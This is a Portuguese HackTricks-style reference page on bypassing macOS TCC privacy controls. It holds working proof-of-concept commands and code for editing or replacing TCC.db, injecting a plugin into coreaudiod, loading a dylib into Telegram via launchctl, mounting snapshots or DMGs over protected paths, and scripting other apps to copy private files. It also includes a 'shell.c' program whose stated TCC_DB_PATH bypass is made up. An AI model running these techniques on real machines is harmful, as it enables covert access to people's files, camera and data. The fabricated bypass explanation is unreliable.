29 KiB
Bypasses do TCC do macOS
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.
Por funcionalidade
Bypass de Escrita
Isso não é um bypass, é apenas como o TCC funciona: Ele não protege contra escrita. Se o Terminal não tiver acesso para ler a área de trabalho de um usuário, ainda poderá escrever nela:
username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
username@hostname ~ % echo asd > Desktop/lalala
username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
username@hostname ~ % cat Desktop/lalala
asd
O atributo estendido com.apple.macl
é adicionado ao novo arquivo para dar acesso ao aplicativo criador para lê-lo.
Caminhos Absolutos do TCC
A maneira mais comum de dar permissão do TCC a um aplicativo é usando o pacote. No entanto, também é possível dar acesso a um binário indicando o caminho absoluto.
A parte interessante é que se você puder sobrescrever o binário, você pode roubar o acesso.
Você pode usar este código para chamar um binário:
{% tabs %} {% tab title="invoker.m" %}
#import <Foundation/Foundation.h>
// clang -fobjc-arc -framework Foundation invoker.m -o invoker
int main(int argc, const char * argv[]) {
@autoreleasepool {
// Check if the argument is provided
if (argc != 2) {
NSLog(@"Usage: %s <path_to_executable>", argv[0]);
return 1;
}
// Create a new task
NSTask *task = [[NSTask alloc] init];
// Set the task's launch path to the provided argument
[task setLaunchPath:@(argv[1])];
// Launch the task
[task launch];
// Wait for the task to complete
[task waitUntilExit];
}
return 0;
}
{% tab title="shell.c" %}
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <command>\n", argv[0]);
return 1;
}
// Set the TCC database path
setenv("TCC_DB_PATH", "/dev/null", 1);
// Execute the command
execvp(argv[1], &argv[1]);
return 0;
}
Este é um programa em C que permite executar comandos no macOS, ignorando as proteções de segurança do TCC (Transparency, Consent, and Control). O programa recebe um comando como argumento e o executa usando a função execvp()
. Antes de executar o comando, ele define o caminho do banco de dados do TCC como "/dev/null" usando a função setenv()
. Isso faz com que o TCC não registre as permissões concedidas ao comando, permitindo que ele seja executado sem solicitar consentimento ao usuário.
Para usar o programa, compile-o usando o seguinte comando:
gcc -o shell shell.c
Em seguida, execute-o com o comando desejado como argumento:
./shell <command>
Substitua <command>
pelo comando que você deseja executar. Por exemplo, se você quiser executar o comando ls -la
, use o seguinte comando:
./shell ls -la
Isso executará o comando ls -la
no macOS, ignorando as proteções de segurança do TCC.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> // For execl and fork
// gcc shell.c -o shell
// mv shell </path/bin/with/TCC>
int main() {
pid_t pid = fork();
if (pid == -1) {
// Fork failed
perror("fork");
return 1;
} else if (pid == 0) {
// Child process
execl("/Applications/iTerm.app/Contents/MacOS/iTerm2", "iTerm2", (char *) NULL);
// execl only returns if there's an error
perror("execl");
exit(EXIT_FAILURE);
} else {
// Parent process
int status;
waitpid(pid, &status, 0); // Wait for the child process to finish
if (WIFEXITED(status)) {
// Return the exit status of iTerm2
return WEXITSTATUS(status);
}
}
return 0;
}
{% endtab %} {% endtabs %}
Bypass SSH
Por padrão, o acesso via SSH costumava ter "Acesso total ao disco". Para desabilitar isso, você precisa ter a opção listada, mas desabilitada (removê-la da lista não removerá esses privilégios):
Aqui você pode encontrar exemplos de como alguns malwares conseguiram burlar essa proteção:
{% hint style="danger" %} Observe que agora, para poder habilitar o SSH, você precisa de Acesso total ao disco {% endhint %}
Manipular extensões - CVE-2022-26767
O atributo com.apple.macl
é atribuído a arquivos para dar a certos aplicativos permissões para lê-los. Esse atributo é definido quando você arrasta e solta um arquivo sobre um aplicativo, ou quando um usuário clica duas vezes em um arquivo para abri-lo com o aplicativo padrão.
Portanto, um usuário poderia registrar um aplicativo malicioso para manipular todas as extensões e chamar o Launch Services para abrir qualquer arquivo (assim, o arquivo malicioso terá acesso concedido para lê-lo).
iCloud
A permissão com.apple.private.icloud-account-access
permite a comunicação com o serviço XPC com.apple.iCloudHelper
, que fornece tokens do iCloud.
iMovie e Garageband tinham essa permissão e outras que permitiam.
Para mais informações sobre a exploração para obter tokens do iCloud dessa permissão, confira a palestra: #OBTS v5.0: "What Happens on your Mac, Stays on Apple's iCloud?!" - Wojciech Regula
kTCCServiceAppleEvents / Automação
Um aplicativo com a permissão kTCCServiceAppleEvents
será capaz de controlar outros aplicativos. Isso significa que ele poderá abusar das permissões concedidas aos outros aplicativos.
Para mais informações sobre Scripts da Apple, confira:
{% content-ref url="macos-apple-scripts.md" %} macos-apple-scripts.md {% endcontent-ref %}
Por exemplo, se um aplicativo tiver permissão de Automação sobre o iTerm
, por exemplo, neste exemplo o Terminal
tem acesso ao iTerm:
Sobre o iTerm
O Terminal, que não tem Acesso total ao disco, pode chamar o iTerm, que tem, e usá-lo para executar ações:
{% code title="iterm.script" %}
tell application "iTerm"
activate
tell current window
create tab with default profile
end tell
tell current session of current window
write text "cp ~/Desktop/private.txt /tmp"
end tell
end tell
{% endcode %}
osascript iterm.script
Sobre o Finder
Ou se um aplicativo tem acesso sobre o Finder, ele pode executar um script como este:
set a_user to do shell script "logname"
tell application "Finder"
set desc to path to home folder
set copyFile to duplicate (item "private.txt" of folder "Desktop" of folder a_user of item "Users" of disk of home) to folder desc with replacing
set t to paragraphs of (do shell script "cat " & POSIX path of (copyFile as alias)) as text
end tell
do shell script "rm " & POSIX path of (copyFile as alias)
Por comportamento do aplicativo
CVE-2020–9934 - TCC
O daemon tccd do espaço do usuário usa a variável de ambiente HOME
para acessar o banco de dados de usuários do TCC em: $HOME/Library/Application Support/com.apple.TCC/TCC.db
De acordo com esta postagem no Stack Exchange e porque o daemon TCC está sendo executado via launchd
no domínio do usuário atual, é possível controlar todas as variáveis de ambiente passadas para ele.
Assim, um atacante poderia definir a variável de ambiente $HOME
no launchctl
para apontar para um diretório controlado, reiniciar o daemon TCC e, em seguida, modificar diretamente o banco de dados do TCC para conceder a si mesmo todas as permissões do TCC disponíveis sem nunca solicitar ao usuário final.
PoC:
# reset database just in case (no cheating!)
$> tccutil reset All
# mimic TCC's directory structure from ~/Library
$> mkdir -p "/tmp/tccbypass/Library/Application Support/com.apple.TCC"
# cd into the new directory
$> cd "/tmp/tccbypass/Library/Application Support/com.apple.TCC/"
# set launchd $HOME to this temporary directory
$> launchctl setenv HOME /tmp/tccbypass
# restart the TCC daemon
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd
# print out contents of TCC database and then give Terminal access to Documents
$> sqlite3 TCC.db .dump
$> sqlite3 TCC.db "INSERT INTO access
VALUES('kTCCServiceSystemPolicyDocumentsFolder',
'com.apple.Terminal', 0, 1, 1,
X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',
NULL,
NULL,
'UNUSED',
NULL,
NULL,
1333333333333337);"
# list Documents directory without prompting the end user
$> ls ~/Documents
CVE-2021-30761 - Notas
As notas tinham acesso a locais protegidos pelo TCC, mas quando uma nota é criada, ela é criada em um local não protegido. Portanto, você poderia pedir para as notas copiarem um arquivo protegido em uma nota (ou seja, em um local não protegido) e, em seguida, acessar o arquivo:
CVE-2021-30782 - Translocação
O binário /usr/libexec/lsd
com a biblioteca libsecurity_translocate
tinha a permissão com.apple.private.nullfs_allow
, que permitia criar um mount nullfs e tinha a permissão com.apple.private.tcc.allow
com kTCCServiceSystemPolicyAllFiles
para acessar todos os arquivos.
Era possível adicionar o atributo de quarentena à "Library", chamar o serviço XPC com.apple.security.translocation
e, em seguida, mapear a Library para $TMPDIR/AppTranslocation/d/d/Library
, onde todos os documentos dentro da Library poderiam ser acessados.
CVE-2023-38571 - Música e TV
O Music
tem um recurso interessante: quando está em execução, ele importará os arquivos arrastados para ~/Music/Music/Media.localized/Automatically Add to Music.localized
para a "biblioteca de mídia" do usuário. Além disso, ele chama algo como: rename(a, b);
onde a
e b
são:
a = "~/Music/Music/Media.localized/Automatically Add to Music.localized/myfile.mp3"
b = "~/Music/Music/Media.localized/Automatically Add to Music.localized/Not Added.localized/2023-09-25 11.06.28/myfile.mp3
Esse comportamento rename(a, b);
é vulnerável a uma Condição de Corrida, pois é possível colocar dentro da pasta Automatically Add to Music.localized
um arquivo falso TCC.db e, em seguida, quando a nova pasta (b) for criada para copiar o arquivo, excluí-lo e apontá-lo para ~/Library/Application Support/com.apple.TCC
/.
SQLITE_SQLLOG_DIR - CVE-2023-32422
Se SQLITE_SQLLOG_DIR="caminho/pasta"
, basicamente significa que qualquer banco de dados aberto é copiado para esse caminho. Nesse CVE, esse controle foi abusado para escrever dentro de um banco de dados SQLite que será aberto por um processo com FDA o banco de dados TCC, e então abusar do SQLITE_SQLLOG_DIR
com um symlink no nome do arquivo para que, quando esse banco de dados for aberto, o arquivo TCC.db do usuário seja sobrescrito com o aberto.
Mais informações aqui.
SQLITE_AUTO_TRACE
Se a variável de ambiente SQLITE_AUTO_TRACE
estiver definida, a biblioteca libsqlite3.dylib
começará a registrar todas as consultas SQL. Vários aplicativos da Apple usavam essa biblioteca para acessar informações protegidas pelo TCC.
# Set this env variable everywhere
launchctl setenv SQLITE_AUTO_TRACE 1
Apple Remote Desktop
Como root, você pode habilitar esse serviço e o agente ARD terá acesso total ao disco, o que pode ser abusado por um usuário para fazer uma cópia de um novo banco de dados de usuário do TCC.
Por NFSHomeDirectory
O TCC usa um banco de dados na pasta HOME do usuário para controlar o acesso a recursos específicos do usuário em $HOME/Library/Application Support/com.apple.TCC/TCC.db. Portanto, se o usuário conseguir reiniciar o TCC com uma variável de ambiente $HOME apontando para uma pasta diferente, o usuário poderá criar um novo banco de dados do TCC em /Library/Application Support/com.apple.TCC/TCC.db e enganar o TCC para conceder qualquer permissão do TCC a qualquer aplicativo.
{% hint style="success" %}
Observe que a Apple usa a configuração armazenada no perfil do usuário no atributo NFSHomeDirectory
para o valor de $HOME
, portanto, se você comprometer um aplicativo com permissões para modificar esse valor (kTCCServiceSystemPolicySysAdminFiles
), você pode armar essa opção com uma bypass do TCC.
{% endhint %}
CVE-2020–9934 - TCC
CVE-2020-27937 - Directory Utility
CVE-2021-30970 - Powerdir
O primeiro POC usa dsexport e dsimport para modificar a pasta HOME do usuário.
- Obtenha um blob csreq para o aplicativo de destino.
- Plante um arquivo falso TCC.db com acesso necessário e o blob csreq.
- Exporte a entrada de Serviços de Diretório do usuário com dsexport.
- Modifique a entrada de Serviços de Diretório para alterar o diretório inicial do usuário.
- Importe a entrada de Serviços de Diretório modificada com dsimport.
- Pare o tccd do usuário e reinicie o processo.
O segundo POC usou /usr/libexec/configd
, que tinha com.apple.private.tcc.allow
com o valor kTCCServiceSystemPolicySysAdminFiles
.
Era possível executar configd
com a opção -t
, um invasor poderia especificar um Bundle personalizado para carregar. Portanto, o exploit substitui o método dsexport
e dsimport
de alterar o diretório inicial do usuário por uma injeção de código do configd
.
Para mais informações, consulte o relatório original.
Por injeção de processo
Existem diferentes técnicas para injetar código em um processo e abusar de suas permissões do TCC:
{% content-ref url="../../../macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
Além disso, a injeção de processo mais comum para contornar o TCC é por meio de plugins (load library).
Plugins são códigos extras geralmente na forma de bibliotecas ou plist, que serão carregados pelo aplicativo principal e executarão sob seu contexto. Portanto, se o aplicativo principal tiver acesso a arquivos restritos pelo TCC (por meio de permissões concedidas ou entitlements), o código personalizado também terá.
CVE-2020-27937 - Directory Utility
O aplicativo /System/Library/CoreServices/Applications/Directory Utility.app
tinha o entitlement kTCCServiceSystemPolicySysAdminFiles
, carregava plugins com a extensão .daplug
e não tinha o runtime endurecido.
Para aproveitar essa CVE, o NFSHomeDirectory
é alterado (abusando do entitlement anterior) para poder assumir o banco de dados do TCC dos usuários e contornar o TCC.
Para mais informações, consulte o relatório original.
CVE-2020-29621 - Coreaudiod
O binário /usr/sbin/coreaudiod
tinha os entitlements com.apple.security.cs.disable-library-validation
e com.apple.private.tcc.manager
. O primeiro permitindo injeção de código e o segundo dando acesso para gerenciar o TCC.
Esse binário permitia carregar plug-ins de terceiros da pasta /Library/Audio/Plug-Ins/HAL
. Portanto, era possível carregar um plugin e abusar das permissões do TCC com este PoC:
#import <Foundation/Foundation.h>
#import <Security/Security.h>
extern void TCCAccessSetForBundleIdAndCodeRequirement(CFStringRef TCCAccessCheckType, CFStringRef bundleID, CFDataRef requirement, CFBooleanRef giveAccess);
void add_tcc_entry() {
CFStringRef TCCAccessCheckType = CFSTR("kTCCServiceSystemPolicyAllFiles");
CFStringRef bundleID = CFSTR("com.apple.Terminal");
CFStringRef pureReq = CFSTR("identifier \"com.apple.Terminal\" and anchor apple");
SecRequirementRef requirement = NULL;
SecRequirementCreateWithString(pureReq, kSecCSDefaultFlags, &requirement);
CFDataRef requirementData = NULL;
SecRequirementCopyData(requirement, kSecCSDefaultFlags, &requirementData);
TCCAccessSetForBundleIdAndCodeRequirement(TCCAccessCheckType, bundleID, requirementData, kCFBooleanTrue);
}
__attribute__((constructor)) static void constructor(int argc, const char **argv) {
add_tcc_entry();
NSLog(@"[+] Exploitation finished...");
exit(0);
Para mais informações, consulte o relatório original.
Plug-ins da Camada de Abstração de Dispositivos (DAL)
Aplicativos do sistema que abrem o fluxo da câmera via Core Media I/O (aplicativos com kTCCServiceCamera
) carregam esses plug-ins no processo localizados em /Library/CoreMediaIO/Plug-Ins/DAL
(não restritos pelo SIP).
Apenas armazenar uma biblioteca com o construtor comum funcionará para injetar código.
Vários aplicativos da Apple eram vulneráveis a isso.
Firefox
O aplicativo Firefox tinha as permissões com.apple.security.cs.disable-library-validation
e com.apple.security.cs.allow-dyld-environment-variables
:
codesign -d --entitlements :- /Applications/Firefox.app
Executable=/Applications/Firefox.app/Contents/MacOS/firefox
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "https://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.apple.security.cs.allow-unsigned-executable-memory</key>
<true/>
<key>com.apple.security.cs.disable-library-validation</key>
<true/>
<key>com.apple.security.cs.allow-dyld-environment-variables</key><true/>
<true/>
<key>com.apple.security.device.audio-input</key>
<true/>
<key>com.apple.security.device.camera</key>
<true/>
<key>com.apple.security.personal-information.location</key>
<true/>
<key>com.apple.security.smartcard</key>
<true/>
</dict>
</plist>
Para mais informações sobre como explorar facilmente isso, verifique o relatório original.
CVE-2020-10006
O binário /system/Library/Filesystems/acfs.fs/Contents/bin/xsanctl
tinha as permissões com.apple.private.tcc.allow
e com.apple.security.get-task-allow
, o que permitia injetar código dentro do processo e usar os privilégios do TCC.
CVE-2023-26818 - Telegram
O Telegram tinha as permissões com.apple.security.cs.allow-dyld-environment-variables
e com.apple.security.cs.disable-library-validation
, então era possível abusar disso para obter acesso às suas permissões, como gravar com a câmera. Você pode encontrar o payload no artigo.
Observe como usar a variável de ambiente para carregar uma biblioteca, um plist personalizado foi criado para injetar essa biblioteca e o launchctl
foi usado para iniciá-la:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.telegram.launcher</string>
<key>RunAtLoad</key>
<true/>
<key>EnvironmentVariables</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/tmp/telegram.dylib</string>
</dict>
<key>ProgramArguments</key>
<array>
<string>/Applications/Telegram.app/Contents/MacOS/Telegram</string>
</array>
<key>StandardOutPath</key>
<string>/tmp/telegram.log</string>
<key>StandardErrorPath</key>
<string>/tmp/telegram.log</string>
</dict>
</plist>
launchctl load com.telegram.launcher.plist
Por meio de invocações abertas
É possível invocar o open
mesmo estando em um ambiente sandbox
Scripts do Terminal
É bastante comum conceder ao terminal o Acesso Total ao Disco (FDA), pelo menos em computadores usados por pessoas da área de tecnologia. E é possível invocar scripts .terminal
usando-o.
Os scripts .terminal
são arquivos plist, como este, com o comando a ser executado na chave CommandString
:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
<dict>
<key>CommandString</key>
<string>cp ~/Desktop/private.txt /tmp/;</string>
<key>ProfileCurrentVersion</key>
<real>2.0600000000000001</real>
<key>RunCommandAsShell</key>
<false/>
<key>name</key>
<string>exploit</string>
<key>type</key>
<string>Window Settings</string>
</dict>
</plist>
Uma aplicação poderia escrever um script de terminal em um local como /tmp e executá-lo com um comando como:
// Write plist in /tmp/tcc.terminal
[...]
NSTask *task = [[NSTask alloc] init];
NSString * exploit_location = @"/tmp/tcc.terminal";
task.launchPath = @"/usr/bin/open";
task.arguments = @[@"-a", @"/System/Applications/Utilities/Terminal.app",
exploit_location]; task.standardOutput = pipe;
[task launch];
Por montagem
CVE-2020-9771 - Bypass do TCC do mount_apfs e escalonamento de privilégios
Qualquer usuário (mesmo os não privilegiados) pode criar e montar um snapshot do time machine e acessar TODOS os arquivos desse snapshot.
O único privilégio necessário é para o aplicativo usado (como o Terminal
) ter Acesso Total ao Disco (FDA) (kTCCServiceSystemPolicyAllfiles
), que precisa ser concedido por um administrador.
{% code overflow="wrap" %}
# Create snapshot
tmutil localsnapshot
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
ls /tmp/snap/Users/admin_user # This will work
{% endcode %}
Uma explicação mais detalhada pode ser encontrada no relatório original.
CVE-2021-1784 & CVE-2021-30808 - Montar sobre o arquivo TCC
Mesmo que o arquivo TCC DB esteja protegido, era possível montar sobre o diretório um novo arquivo TCC.db:
{% code overflow="wrap" %}
# CVE-2021-1784
## Mount over Library/Application\ Support/com.apple.TCC
hdiutil attach -owners off -mountpoint Library/Application\ Support/com.apple.TCC test.dmg
# CVE-2021-1784
## Mount over ~/Library
hdiutil attach -readonly -owners off -mountpoint ~/Library /tmp/tmp.dmg
{% endcode %}
# This was the python function to create the dmg
def create_dmg():
os.system("hdiutil create /tmp/tmp.dmg -size 2m -ov -volname \"tccbypass\" -fs APFS 1>/dev/null")
os.system("mkdir /tmp/mnt")
os.system("hdiutil attach -owners off -mountpoint /tmp/mnt /tmp/tmp.dmg 1>/dev/null")
os.system("mkdir -p /tmp/mnt/Application\ Support/com.apple.TCC/")
os.system("cp /tmp/TCC.db /tmp/mnt/Application\ Support/com.apple.TCC/TCC.db")
os.system("hdiutil detach /tmp/mnt 1>/dev/null")
Verifique o exploit completo no artigo original.
asr
A ferramenta /usr/sbin/asr
permitia copiar todo o disco e montá-lo em outro local, contornando as proteções do TCC.
Serviços de Localização
Existe um terceiro banco de dados do TCC em /var/db/locationd/clients.plist
para indicar os clientes autorizados a acessar os serviços de localização.
A pasta /var/db/locationd/
não estava protegida contra montagem de DMG, então era possível montar nosso próprio plist.
Por meio de aplicativos de inicialização
{% content-ref url="../../../../macos-auto-start-locations.md" %} macos-auto-start-locations.md {% endcontent-ref %}
Por meio do comando grep
Em várias ocasiões, arquivos armazenam informações sensíveis como e-mails, números de telefone, mensagens... em locais não protegidos (o que é considerado uma vulnerabilidade na Apple).
Cliques sintéticos
Isso não funciona mais, mas funcionou no passado:
Outra maneira usando eventos CoreGraphics:
Referência
- https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8
- https://www.sentinelone.com/labs/bypassing-macos-tcc-user-privacy-protections-by-accident-and-design/
- 20+ Maneiras de Contornar os Mecanismos de Privacidade do seu macOS
- Knockout Win Against TCC - 20+ NEW Ways to Bypass Your MacOS Privacy Mechanisms
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Gostaria de ver sua empresa anunciada no HackTricks? Ou gostaria de ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e para o repositório hacktricks-cloud.